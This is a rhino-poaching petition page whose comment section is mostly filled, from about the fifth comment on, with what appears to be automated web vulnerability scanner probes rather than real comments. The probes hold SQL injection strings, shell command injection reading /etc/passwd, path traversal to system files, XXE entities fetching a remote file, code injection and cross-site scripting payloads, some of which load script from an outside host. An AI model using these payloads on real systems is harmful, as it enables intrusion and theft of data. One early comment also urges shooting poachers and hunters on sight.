Powered by iPetitions - Start your online petition now

Rhino Poaching: An African Tragedy. A Global Responsibility!

South Africa is custodian to over 90% of the world’s rhino.

  • In 2010 alone, 333 rhino were killed in South Africa by poachers for their horn. Already in 2011 over 149 rhino have been poached (one per day).
  • It has been proven that the horn has no medicinal value and is not a cure for cancer. However it is still sought after and mainly in the East.
  • The killing will only stop when the horror of it all is understood.
If these images trouble you, we urge you to join thousands of others who object to the senseless killing of these rhino by signing the petition.

This petition will be taken to the highest governmental powers and is a vital part of the lobbying campaign which is needed to change laws regarding the importation of rhino horn into foreign countries.
It is only through a GLOBAL campaign and POLITICAL will that we can save this remnant of the dinosaur age – the rhino.
This initiative is spearheaded by Dr Ian Player (founder) and Andrew Muir (CEO) of the Wilderness Foundation.

In the horrific image below, a rhino from an Eastern Cape private game reserve had its horn hacked off while it was still alive. Vets and wildlife managers tried in vain to save its life but the wounds were too severe and it had to be put down.

  1. # Rohit Patil on 30 June 2012 at 4:53:

    Poachers should be shot on sight. Same goes for game hunters.

  2. # Harbin Houde's shop on 3 November 2012 at 6:46:

    Hiya, I am really glad I have found this information. Nowadays bloggers publish only about gossips and web and this is actually irritating. A good web site with exciting content, that's what I need. Thanks for keeping this web-site, I will be visiting it. Do you do newsletters? Cant find it.

  3. # website cheapest cheap wow gold on 3 November 2012 at 6:55:

    What's up, I read your blogs regularly. Your humoristic style is witty, keep it up!

  4. # 1 on 6 November 2012 at 8:55:

    1

  5. # response.write(9381651*9091448) on 6 November 2012 at 18:33:

    1

  6. # '+response.write(9381651*9091448)+' on 6 November 2012 at 18:33:

    1

  7. # "+response.write(9381651*9091448)+" on 6 November 2012 at 18:33:

    1

  8. # 1 on 6 November 2012 at 18:33:

    1

  9. # 1 on 6 November 2012 at 18:33:

    1

  10. # &cat /etc/passwd& on 6 November 2012 at 18:33:

    1

  11. # -1 or 29=29 on 6 November 2012 at 18:33:

    1

  12. # '&cat /etc/passwd&' on 6 November 2012 at 18:33:

    1

  13. # 1 on 6 November 2012 at 18:33:

    response.write(9588972*9086275)

  14. # "&cat /etc/passwd&" on 6 November 2012 at 18:33:

    1

  15. # -1 or 29=0 on 6 November 2012 at 18:33:

    1

  16. # 1 on 6 November 2012 at 18:33:

    '+response.write(9588972*9086275)+'

  17. # cat /etc/passwd on 6 November 2012 at 18:33:

    1

  18. # -1' or '89'='89 on 6 November 2012 at 18:33:

    1

  19. # `cat /etc/passwd` on 6 November 2012 at 18:33:

    1

  20. # 1 on 6 November 2012 at 18:33:

    "+response.write(9588972*9086275)+"

  21. # -1' or '89'='0 on 6 November 2012 at 18:33:

    1

  22. # |cat /etc/passwd# on 6 November 2012 at 18:33:

    1

  23. # SomeCustomInjectedHeader:injected_by_wvs on 6 November 2012 at 18:33:

    1

  24. # -1" or "34"="34 on 6 November 2012 at 18:33:

    1

  25. # ../../../../../../../../../../etc/passwd on 6 November 2012 at 18:33:

    1

  26. # '|'ld on 6 November 2012 at 18:33:

    1

  27. # SomeCustomInjectedHeader:injected_by_wvs on 6 November 2012 at 18:33:

    1

  28. # -1" or "34"="0 on 6 November 2012 at 18:33:

    1

  29. # ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 6 November 2012 at 18:33:

    1

  30. # "|"ld on 6 November 2012 at 18:33:

    1

  31. # 1 and sleep(4) on 6 November 2012 at 18:33:

    1

  32. # SomeCustomInjectedHeader:injected_by_wvs on 6 November 2012 at 18:33:

    1

  33. # ../../../../../../../../../../etc/passwd.jpg on 6 November 2012 at 18:33:

    1

  34. # ;cat /etc/passwd; on 6 November 2012 at 18:33:

    1

  35. # 1 or (sleep(4)+1) limit 1 -- on 6 November 2012 at 18:33:

    1

  36. # Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n on 6 November 2012 at 18:33:

    1

  37. # 1' and sleep(4)=' on 6 November 2012 at 18:33:

    1

  38. # ';cat /etc/passwd;' on 6 November 2012 at 18:33:

    1

  39. # ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 6 November 2012 at 18:33:

    1

  40. # 1' and (sleep(4)+1) limit 1 -- on 6 November 2012 at 18:33:

    1

  41. # /../..//../..//../..//../..//../..//etc/passwd.jpg on 6 November 2012 at 18:33:

    1

  42. # ";cat /etc/passwd;" on 6 November 2012 at 18:33:

    1

  43. # 1" and sleep(4)=" on 6 November 2012 at 18:33:

    1

  44. # .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd on 6 November 2012 at 18:33:

    1

  45. # ||cat /etc/passwd on 6 November 2012 at 18:33:

    1

  46. # 1' or (sleep(4)+1) limit 1 -- on 6 November 2012 at 18:33:

    1

  47. # &dir on 6 November 2012 at 18:33:

    1

  48. # 1" or (sleep(4)+1) limit 1 -- on 6 November 2012 at 18:33:

    1

  49. # 1 on 6 November 2012 at 18:33:

    1

  50. # /etc/passwd on 6 November 2012 at 18:33:

    1

  51. # '&dir&' on 6 November 2012 at 18:33:

    1

  52. # 1 on 6 November 2012 at 18:33:


    SomeCustomInjectedHeader:injected_by_wvs

  53. # 1'=sleep(4)=' on 6 November 2012 at 18:33:

    1

  54. # ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd on 6 November 2012 at 18:33:

    1

  55. # "&dir&" on 6 November 2012 at 18:33:

    1

  56. # 1 on 6 November 2012 at 18:33:


    SomeCustomInjectedHeader:injected_by_wvs

  57. # ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd on 6 November 2012 at 18:33:

    1

  58. # |dir on 6 November 2012 at 18:33:

    1

  59. # 1"=sleep(4)=" on 6 November 2012 at 18:33:

    1

  60. # 1 on 6 November 2012 at 18:33:


    SomeCustomInjectedHeader:injected_by_wvs

  61. # .. on 6 November 2012 at 18:33:

    1

  62. # '|dir on 6 November 2012 at 18:33:

    1

  63. # 1;select pg_sleep(4); -- on 6 November 2012 at 18:33:

    1

  64. # ${99333+100284} on 6 November 2012 at 18:33:

    1

  65. # 268435455 on 6 November 2012 at 18:33:

    1

  66. # invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././ on 6 November 2012 at 18:33:

    1

  67. # "|dir on 6 November 2012 at 18:33:

    1

  68. # on 6 November 2012 at 18:33:

    1

  69. # 1';select pg_sleep(4); -- on 6 November 2012 at 18:33:

    1

  70. # file:///etc/passwd on 6 November 2012 at 18:33:

    1

  71. # .. on 6 November 2012 at 18:33:

    1

  72. # /\../\../\../\../\../\../\../etc/passwd on 6 November 2012 at 18:33:

    1

  73. # 1; waitfor delay '0:0:4' -- on 6 November 2012 at 18:33:

    1

  74. # 1e309 on 6 November 2012 at 18:33:

    1

  75. # 1 on 6 November 2012 at 18:33:

    ${99845+100068}

  76. # WEB-INF/web.xml on 6 November 2012 at 18:33:

    1

  77. # '"\'\");|]*{ <> on 6 November 2012 at 18:33:

    1

  78. # WEB-INF\web.xml on 6 November 2012 at 18:33:

    1

  79. # http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg on 6 November 2012 at 18:33:

    1

  80. # 1'; waitfor delay '0:0:4' -- on 6 November 2012 at 18:33:

    1

  81. # ../../../../../../../../../../windows/win.ini on 6 November 2012 at 18:33:

    1

  82. # Array on 6 November 2012 at 18:33:

    1

  83. # 1some_inexistent_file_with_long_name%00.jpg on 6 November 2012 at 18:33:

    1

  84. # 1"; waitfor delay '0:0:4' -- on 6 November 2012 at 18:33:

    1

  85. # ../../../../../../../../../../boot.ini on 6 November 2012 at 18:33:

    1

  86. # http://testasp.vulnweb.com/t/fit.txt?%00.jpg on 6 November 2012 at 18:33:

    1

  87. # 1 on 6 November 2012 at 18:33:

    1

  88. # testasp.vulnweb.com on 6 November 2012 at 18:33:

    1

  89. # ../../../../../../../../../../windows/win.ini.jpg on 6 November 2012 at 18:33:

    1

  90. # on 6 November 2012 at 18:33:

    1

  91. # ................windowswin.ini on 6 November 2012 at 18:33:

    1

  92. # ..\..\..\..\..\..\..\..\windows\win.ini on 6 November 2012 at 18:33:

    1

  93. # /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini on 6 November 2012 at 18:33:

    1

  94. # ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini on 6 November 2012 at 18:33:

    1

  95. # ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini on 6 November 2012 at 18:33:

    1

  96. # unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ on 6 November 2012 at 18:33:

    1

  97. # WEB-INF/web.xml on 6 November 2012 at 18:33:

    1

  98. # WEB-INF\web.xml on 6 November 2012 at 18:33:

    1

  99. # 1 on 6 November 2012 at 18:33:

    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

  100. # 1 on 6 November 2012 at 18:33:

    1some_inexistent_file_with_long_name%00.jpg

  101. # 1 on 6 November 2012 at 18:33:

    http://testasp.vulnweb.com/t/fit.txt?%00.jpg

  102. # 1 on 6 November 2012 at 18:33:

    testasp.vulnweb.com

  103. # 1&n950714=v943633 on 6 November 2012 at 18:33:

    1

  104. # 1 on 6 November 2012 at 18:33:

    1

  105. # 1 on 6 November 2012 at 18:34:

    268435455

  106. # ) on 6 November 2012 at 18:34:

    1

  107. # 1 on 6 November 2012 at 18:34:

    1&n967063=v948964

  108. # !(()&&!|*|*| on 6 November 2012 at 18:34:

    1

  109. # 1 on 6 November 2012 at 18:34:

  110. # ^(#$!@#$)(()))****** on 6 November 2012 at 18:34:

    1

  111. # Array on 6 November 2012 at 18:34:

    1

  112. # '"() on 6 November 2012 at 18:34:

    1

  113. # 1 on 6 November 2012 at 18:34:

    &cat /etc/passwd&

  114. # 1 on 6 November 2012 at 18:34:

    )

  115. # 1 on 6 November 2012 at 18:34:

    '&cat /etc/passwd&'

  116. # 1 on 6 November 2012 at 18:34:

    1

  117. # 1 on 6 November 2012 at 18:34:

    "&cat /etc/passwd&"

  118. # 1 on 6 November 2012 at 18:34:

    !(()&&!|*|*|

  119. # 1 on 6 November 2012 at 18:34:

    1

  120. # 1 on 6 November 2012 at 18:34:


    cat /etc/passwd

  121. # 1 on 6 November 2012 at 18:34:

    ^(#$!@#$)(()))******

  122. # 1 on 6 November 2012 at 18:34:

    -1 or 99=99

  123. # 1 on 6 November 2012 at 18:34:

    Array

  124. # 1 on 6 November 2012 at 18:34:

    `cat /etc/passwd`

  125. # ;print(md5(acunetix_wvs_security_test)); on 6 November 2012 at 18:34:

    1

  126. # 1 on 6 November 2012 at 18:34:

    ..

  127. # 1 on 6 November 2012 at 18:34:

    -1 or 99=0

  128. # 1 on 6 November 2012 at 18:34:

    '"()

  129. # ';print(md5(acunetix_wvs_security_test));$a=' on 6 November 2012 at 18:34:

    1

  130. # 1 on 6 November 2012 at 18:34:

    |cat /etc/passwd#

  131. # 1 on 6 November 2012 at 18:34:

    1e309

  132. # 1 on 6 November 2012 at 18:34:

    -1' or '95'='95

  133. # ";print(md5(acunetix_wvs_security_test));$a=" on 6 November 2012 at 18:34:

    1

  134. # 1 on 6 November 2012 at 18:34:

    '"\'\");|]*{
    <>

  135. # ${@print(md5(acunetix_wvs_security_test))} on 6 November 2012 at 18:34:

    1

  136. # 1 on 6 November 2012 at 18:34:

    Array

  137. # ${@print(md5(acunetix_wvs_security_test))}\ on 6 November 2012 at 18:34:

    1

  138. # 1 on 6 November 2012 at 18:34:

    1

  139. # http://testasp.vulnweb.com/t/xss.html?%00.jpg on 6 November 2012 at 18:34:

    1

  140. # 1 on 6 November 2012 at 18:34:

    '|'ld

  141. # 1 on 6 November 2012 at 18:34:

    -1' or '95'='0

  142. # acunetix_wvs_invalid_filename on 6 November 2012 at 18:34:

    1

  143. # 1 on 6 November 2012 at 18:34:

    -1" or "97"="97

  144. # 1 on 6 November 2012 at 18:34:

    -1" or "97"="0

  145. # 1 on 6 November 2012 at 18:34:

    "|"ld

  146. # 6030 on 6 November 2012 at 18:34:

    1

  147. # 1 on 6 November 2012 at 18:34:

    1 and sleep(4)

  148. # 1 on 6 November 2012 at 18:34:

    ;cat /etc/passwd;

  149. # 6030 on 6 November 2012 at 18:34:

    1

  150. # 1 on 6 November 2012 at 18:34:

    http://testasp.vulnweb.com/t/xss.html?%00.jpg

  151. # 1 on 6 November 2012 at 18:34:

    1 or (sleep(4)+1) limit 1 --

  152. # http://testasp.vulnweb.com/t/fit.txt on 6 November 2012 at 18:34:

    1

  153. # 1 on 6 November 2012 at 18:34:

    ';cat /etc/passwd;'

  154. # 6030/. on 6 November 2012 at 18:34:

    1

  155. # 1 on 6 November 2012 at 18:34:

    1' and sleep(4)='

  156. # 1 on 6 November 2012 at 18:34:

    1' and (sleep(4)+1) limit 1 --

  157. # 1 on 6 November 2012 at 18:34:

    ";cat /etc/passwd;"

  158. # 1 on 6 November 2012 at 18:34:

    1" and sleep(4)="

  159. # 1 on 6 November 2012 at 18:34:

    ||cat /etc/passwd

  160. # 1 on 6 November 2012 at 18:34:

    1' or (sleep(4)+1) limit 1 --

  161. # 1 on 6 November 2012 at 18:34:

    http://testasp.vulnweb.com/t/fit.txt

  162. # 1 on 6 November 2012 at 18:34:

    1" or (sleep(4)+1) limit 1 --

  163. # 1 on 6 November 2012 at 18:34:

    &dir

  164. # 1 on 6 November 2012 at 18:34:

    ;print(md5(acunetix_wvs_security_test));

  165. # 1 on 6 November 2012 at 18:34:

    1

  166. # 1 on 6 November 2012 at 18:34:

    ';print(md5(acunetix_wvs_security_test));$a='

  167. # 1'" on 6 November 2012 at 18:34:

    1

  168. # 1 on 6 November 2012 at 18:34:

    1'=sleep(4)='

  169. # 1 on 6 November 2012 at 18:34:

    '&dir&'

  170. # 1 on 6 November 2012 at 18:34:

    ";print(md5(acunetix_wvs_security_test));$a="

  171. # \ on 6 November 2012 at 18:34:

    1

  172. # 1 on 6 November 2012 at 18:34:

    1'=sleep(0)='

  173. # 1 on 6 November 2012 at 18:34:

    "&dir&"

  174. # 1 on 6 November 2012 at 18:34:

    ${@print(md5(acunetix_wvs_security_test))}

  175. # 1 on 6 November 2012 at 18:34:

    ${@print(md5(acunetix_wvs_security_test))}\

  176. # 1 on 6 November 2012 at 18:34:

    1

  177. # 1 on 6 November 2012 at 18:34:

    acunetix_wvs_invalid_filename

  178. # 1 on 6 November 2012 at 18:34:

    6030

  179. # 1Axa7A? on 6 November 2012 at 18:34:

    1

  180. # 1 on 6 November 2012 at 18:34:

    1'=sleep(2)='

  181. # 1 on 6 November 2012 at 18:34:

    |dir

  182. # 1 on 6 November 2012 at 18:34:

    6030

  183. # ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) on 6 November 2012 at 18:34:

    1

  184. # @@tYDWV on 6 November 2012 at 18:34:

    1

  185. # 1 on 6 November 2012 at 18:34:

    '|dir

  186. # 1 on 6 November 2012 at 18:34:

    1'=sleep(4)='

  187. # 1 on 6 November 2012 at 18:34:

    6030/.

  188. # JyI= on 6 November 2012 at 18:34:

    1

  189. # 1 on 6 November 2012 at 18:34:

    1"=sleep(4)="

  190. # //www.acunetix.tst on 6 November 2012 at 18:34:

    1

  191. # 1 on 6 November 2012 at 18:34:

    "|dir

  192. # 1 on 6 November 2012 at 18:34:

    1;select pg_sleep(4); --

  193. # ?'?" on 6 November 2012 at 18:34:

    1

  194. # 1 on 6 November 2012 at 18:34:

    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  195. # ?''?"" on 6 November 2012 at 18:34:

    1

  196. # <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acuneti on 6 November 2012 at 18:34:

    1

  197. # 1 on 6 November 2012 at 18:34:

    1';select pg_sleep(4); --

  198. # '" on 6 November 2012 at 18:34:

    1

  199. # 1 on 6 November 2012 at 18:34:

    //www.acunetix.tst

  200. # 1 on 6 November 2012 at 18:34:

    1; waitfor delay '0:0:4' --

  201. # '"()&%1<ScRiPt >prompt(978000)</ScRiPt> on 6 November 2012 at 18:34:

    1

  202. # <!-- on 6 November 2012 at 18:34:

    1

  203. # 1 on 6 November 2012 at 18:34:

    1'; waitfor delay '0:0:4' --

  204. # 1 on 6 November 2012 at 18:34:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE acunetix [
    <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt">
    ]>
    <xxx>&acunetixent;</xxx>

  205. # 1 on 6 November 2012 at 18:34:

    1"; waitfor delay '0:0:4' --

  206. # OTk0NTE4 on 6 November 2012 at 18:34:

    1

  207. # 1 on 6 November 2012 at 18:34:

    '"

  208. # 1 on 6 November 2012 at 18:34:

    <!--

  209. # undefined1<ScRiPt >prompt(981562)</ScRiPt> on 6 November 2012 at 18:34:

    1

  210. # 1<ScRiPt >prompt(983816)</ScRiPt> on 6 November 2012 at 18:34:

    1

  211. # 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908265></ScRiPt> on 6 November 2012 at 18:34:

    1

  212. # 1<ScRiPt >prompt(950703)</ScRiPt> on 6 November 2012 at 18:34:

    1

  213. # <video><source onerror="javascript:prompt(940357)"> on 6 November 2012 at 18:34:

    1

  214. # <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952633)"></g></svg> on 6 November 2012 at 18:34:

    1

  215. # 1 on 6 November 2012 at 18:34:

    1

  216. # 1 on 6 November 2012 at 18:34:

    1'"

  217. # 1 on 6 November 2012 at 18:34:

    \

  218. # 1 on 6 November 2012 at 18:34:

    1Axa7A?

  219. # 1 on 6 November 2012 at 18:34:

    @@Aj3TQ

  220. # 1[url=javascript:prompt(957489)]http://www.acunetix.com[/url] on 6 November 2012 at 18:34:

    1

  221. # 1 on 6 November 2012 at 18:34:

    JyI=

  222. # 1 on 6 November 2012 at 18:34:

    ?'?"

  223. # 1 on 6 November 2012 at 18:34:

    ?''?""

  224. # 1<div style=width:expression(prompt(954455))> on 6 November 2012 at 18:34:

    1

  225. # <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='938456'> on 6 November 2012 at 18:34:

    1

  226. # <body onload=prompt(925832)> on 6 November 2012 at 18:35:

    1

  227. # 1 on 6 November 2012 at 18:35:

    ../../../../../../../../../../etc/passwd

  228. # 1 on 6 November 2012 at 18:35:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  229. # <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921625)> on 6 November 2012 at 18:35:

    1

  230. # 1 on 6 November 2012 at 18:35:

    ../../../../../../../../../../etc/passwd.jpg

  231. # 1 on 6 November 2012 at 18:35:

    Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

  232. # 1 on 6 November 2012 at 18:35:

    ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

  233. # 1 on 6 November 2012 at 18:35:

    /../..//../..//../..//../..//../..//etc/passwd.jpg

  234. # <img src=xyz OnErRor=prompt(922634)> on 6 November 2012 at 18:35:

    1

  235. # 1 on 6 November 2012 at 18:35:

    .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

  236. # 1 on 6 November 2012 at 18:35:

    /etc/passwd

  237. # 1 on 6 November 2012 at 18:35:

    ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

  238. # 1 on 6 November 2012 at 18:35:

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

  239. # 1 on 6 November 2012 at 18:35:

    ..

  240. # <img/src=">" onerror=alert(934900)> on 6 November 2012 at 18:35:

    1

  241. # 1 on 6 November 2012 at 18:35:

    invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

  242. # 1 on 6 November 2012 at 18:35:

    file:///etc/passwd

  243. # 1%3CScRiPt%20%3Eprompt(945016)%3C/sCripT%3E on 6 November 2012 at 18:35:

    1

  244. # 1 on 6 November 2012 at 18:35:

    /\../\../\../\../\../\../\../etc/passwd

  245. # 1 on 6 November 2012 at 18:35:

    WEB-INF/web.xml

  246. # 1 on 6 November 2012 at 18:35:

    WEB-INF\web.xml

  247. # 1 on 6 November 2012 at 18:35:

    ../../../../../../../../../../windows/win.ini

  248. # 1 on 6 November 2012 at 18:35:

    ../../../../../../../../../../boot.ini

  249. # 1 on 6 November 2012 at 18:35:

    ../../../../../../../../../../windows/win.ini.jpg

  250. # o<img acu onmouseover=prompt(999385) //o> on 6 November 2012 at 18:35:

    1

  251. # 1 on 6 November 2012 at 18:35:

  252. # 1 on 6 November 2012 at 18:35:

    ................windowswin.ini

  253. # 1 on 6 November 2012 at 18:35:

    ..\..\..\..\..\..\..\..\windows\win.ini

  254. # 1 on 6 November 2012 at 18:35:

    /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

  255. # 1 on 6 November 2012 at 18:35:

    ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

  256. # 1 on 6 November 2012 at 18:35:

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

  257. # <input autofocus onfocus=prompt(947466)> on 6 November 2012 at 18:35:

    1

  258. # 1 on 6 November 2012 at 18:35:

    unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.